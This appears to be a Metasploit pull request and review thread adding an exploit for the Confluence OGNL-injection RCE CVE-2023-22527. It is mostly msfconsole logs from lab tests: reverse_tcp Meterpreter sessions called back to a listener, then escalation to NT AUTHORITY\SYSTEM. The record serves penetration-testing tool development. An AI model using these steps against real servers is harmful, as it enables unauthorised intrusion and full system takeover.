Add exploit for CVE-2023-22527 (Confluence RCE)

[zeroSteiner]

This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which can be trivially escalated to NT AUTHORITY\SYSTEM using the RPCSS namedpipe impersonation technique added in #14030 (getsystem -t 4).

Closes #18731

Verification

• Follow the steps from the Setup section to create a test instance
• Start msfconsole
• Run: use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527
• Set the RHOSTS, PAYLOAD and payload-related options
• Run the module

Demo

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set TARGET Windows\ Command 
TARGET => Windows Command
List the steps needed to make sure this thing works
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > exploit

[*] Powershell command length: 4371
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Confluence version: 8.5.3
[*] Detected target platform: Windows Server 2019
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 192.168.159.10:58923) at 2024-01-24 12:47:39 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\Atlassian\Confluence
meterpreter > 

[cgranleese-r7]

Can the tester keep an eye out for stability when running this multiple times.

[jheysel-r7]

Great module @zeroSteiner, one minor suggestion, testing was as expected on both Unix and Windows. I reran the module on each OS a couple times and the stability seemed fine to me.

Windows Command

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 1
target => 1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49939) at 2024-01-25 12:57:40 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : WIN-2EEL7BRDUD8
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Unix Command

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 0
target => 0
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24772 bytes) to 172.16.199.1
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:63558) at 2024-01-25 13:27:28 -0500

meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer        : 6bb0a19104ea
OS              : Linux 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

[jheysel-r7]

I hastily ran the module without switching to the appropriate target and appreciated the detail in this error message.

[-] Exploit aborted due to failure: no-target: The target platform 'Windows Server 2022' is incompatible with 'Unix Command'

[jheysel-r7]

Suggested change

	return CheckCode::Unknown unless confluence_version
	return CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version

[jheysel-r7]

Testing the atlassian_confluence_namespace_ognl_injection update to use the get_confluence_version from the new mixin:

msf6 > use multi/http/atlassian_confluence_namespace_ognl_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set verbose true
verbose => true
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check

[*] Detected Confluence version: 8.5.1
[*] 172.16.199.134:8090 - The target is not exploitable. Failed to test OGNL injection.
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) >

[jheysel-r7]

Release Notes

This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account